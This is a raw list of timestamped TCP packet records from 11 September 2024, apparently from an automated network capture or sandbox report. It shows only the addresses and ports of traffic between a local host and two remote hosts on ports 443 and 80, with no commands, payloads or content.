                                                Sep 11, 2024 20:22:23.427618027 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.427690983 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.427694082 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.427722931 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.427747011 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.428328991 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.428381920 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.428392887 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.428419113 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.428446054 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.428647041 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.428808928 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.428874016 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.428878069 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.428906918 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.428936005 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.428977013 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.487098932 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.487170935 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.487335920 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.487335920 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.487335920 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.487396002 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.487586021 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.487646103 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.487656116 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.487682104 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.487716913 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.516791105 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.516858101 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.516920090 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.516937017 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.516978979 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.516978979 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.517688990 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.517752886 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.517760038 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.517790079 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.517822027 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.518497944 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.518557072 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.518563032 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.518594027 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.518625975 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.520302057 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.520368099 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.520378113 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.520402908 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.520441055 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.520772934 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.520833969 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.520838022 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.520864010 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.520895958 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.521193981 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.521270037 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.521280050 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.521305084 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.521337032 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.606240988 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.606388092 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.606410027 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.606432915 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.606482983 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.606491089 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.606591940 CEST44349162207.241.227.96192.168.2.22
                                                Sep 11, 2024 20:22:23.606637955 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.609018087 CEST49162443192.168.2.22207.241.227.96
                                                Sep 11, 2024 20:22:23.726671934 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:23.731753111 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:23.731827974 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:23.731884003 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:23.736692905 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.469748974 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.469768047 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.469779968 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.469784021 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.469845057 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.469857931 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.469868898 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.469875097 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.469912052 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.469912052 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.469950914 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.469964027 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.469988108 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.475203037 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.475264072 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.475330114 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.599845886 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.599874973 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.599884033 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.599945068 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.599956989 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.599958897 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.599967957 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.599991083 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.600018024 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.600061893 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.600661993 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.600842953 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.600853920 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.600863934 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.600886106 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.601290941 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.601336002 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.601363897 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.601373911 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.601402044 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.601463079 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.601475000 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.601509094 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.604971886 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.604984045 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.604999065 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.605009079 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.605020046 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.605046034 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.605046034 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.605407000 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.605417967 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.605463028 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.731842041 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.731863976 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.731875896 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.731954098 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.731975079 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.732001066 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.732043982 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.732049942 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.732063055 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.732074976 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.732125998 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.732163906 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.732177019 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.732188940 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.732203007 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.732218027 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.732247114 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.732645035 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.732677937 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.732690096 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.732723951 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.732831955 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.732842922 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.732876062 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.733180046 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.871368885 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.871396065 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.871407986 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.871434927 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.871448994 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.871460915 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.871467113 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.871525049 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.871525049 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.871525049 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.871566057 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.871578932 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.871591091 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.871637106 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.871753931 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.871798992 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.871798992 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.871812105 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.871844053 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.871923923 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.871936083 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.871948957 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.871962070 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.871970892 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.872000933 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.872066975 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.872078896 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.872092009 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.872127056 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.872736931 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.872757912 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.872770071 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.872781992 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.872805119 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.872867107 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.873075962 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.873116016 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.873125076 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.873137951 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.873151064 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.873167038 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.873191118 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.873228073 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.873296976 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.873308897 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.873321056 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.873333931 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.873334885 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.873352051 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.873367071 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.874114037 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.874125004 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.874135971 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.874161959 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.874244928 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.874258041 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.874269962 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.874280930 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.874293089 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.874335051 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:24.962151051 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.962224960 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:24.962269068 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.002793074 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.002806902 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.002821922 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.002834082 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.002863884 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.002896070 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.004103899 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004146099 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004158020 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004234076 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004245043 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004255056 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004266977 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004379988 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.004379988 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.004379988 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.004396915 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004406929 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004416943 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004427910 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004440069 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004440069 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.004462957 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.004543066 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004554987 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004565001 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004591942 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.004697084 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004708052 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004717112 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004728079 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004738092 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004743099 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.004749060 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004754066 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.004762888 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004772902 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004782915 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004787922 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.004795074 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.004813910 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.004829884 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.004847050 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.004947901 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.005317926 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.005358934 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.005369902 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.005371094 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.005403996 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.005470991 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.005481005 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.005491018 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.005501032 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.005516052 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.005531073 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.005589962 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.005600929 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.005611897 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.005633116 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.006259918 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.006324053 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.006330013 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.052676916 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.052798986 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.132515907 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.132544994 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.132555962 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.132587910 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.132599115 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.132608891 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.132621050 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.132621050 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.132621050 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.132654905 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.132730007 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.132740021 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.132751942 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.132769108 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.132848978 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.132858992 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.132869959 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.132882118 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.132893085 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.132921934 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.133039951 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133049965 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133059978 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133069992 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133084059 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133088112 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.133099079 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.133233070 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133243084 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133251905 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133263111 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133272886 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133280039 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.133284092 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133295059 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133304119 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.133306980 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133311987 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.133320093 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133346081 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.133924007 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133969069 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.133971930 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.133981943 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134023905 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.134056091 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134066105 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134074926 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134084940 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134104967 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.134119034 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.134205103 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134216070 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134224892 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134253025 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.134255886 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134270906 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134282112 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134293079 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134301901 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.134320021 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.134885073 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134928942 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134929895 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.134939909 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.134969950 CEST4916380192.168.2.2245.90.89.123
                                                Sep 11, 2024 20:22:25.135041952 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.135056019 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.135066032 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.135077953 CEST804916345.90.89.123192.168.2.22
                                                Sep 11, 2024 20:22:25.135092974 CEST4916380192.168.2.2245.90.89.123
